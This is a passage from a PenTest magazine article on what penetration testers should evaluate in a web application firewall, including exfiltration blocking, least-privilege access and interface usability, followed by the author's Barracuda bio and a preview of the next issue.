A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and stops it. Penetration testers can fall back on web scanners to run security checks on web applications; several WAFs provide extra interfaces to automate such tests.

Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well, in particular its identity and access management. Here the principle of least privilege applies: users are granted only those privileges they need for their work or for the use of the web application, and all other privileges are blocked. Integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.

The user interface is another especially critical point, because it is the basis for safe WAF configuration.

Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, are clearly displayed and easy to understand and set, this in practice makes the greatest contribution to system security. A further plus is a user interface that is identical across several of a manufacturer's products or, even better, a management center through which administrators can manage numerous other network and security products alongside the WAF. Administrators can then rely on familiar configuration processes for security clusters, which ensures that security configurations are consistent across the organization. An extensive penetration test of web applications should therefore include the ergonomics of the WAF interface in its evaluation, along with the consistency of security deployment across applications and sites.

In summary, any web application, old or new, should be secured by a WAF in Full Reverse Proxy mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place; whether it prevents the hacking of the application itself with common or novel means; whether it secures all the backend systems the application connects to; and whether it stops leakage of sensitive data where the web application has weaknesses the WAF cannot compensate for. If penetration testers are not just looking for a security snapshot but want to help their customers build sustainable security, they should always include the WAF's administration in their assessment.

OLIVER WAI
Oliver Wai leads product marketing for Barracuda Networks' Web application security and application delivery product lines. In this role he is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. He holds an M.S. in Management Science & Engineering from Stanford University and a B.S. (cum laude) in Computer Engineering from Santa Clara University.


In the upcoming issue of the PenTest magazine:

- Web Session Management
- Password management in code
- ETHical Ghosts on SF1
- Preservation, namely in the online gambling industry
- Cyber Security War

Available to download on December 22nd


If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.

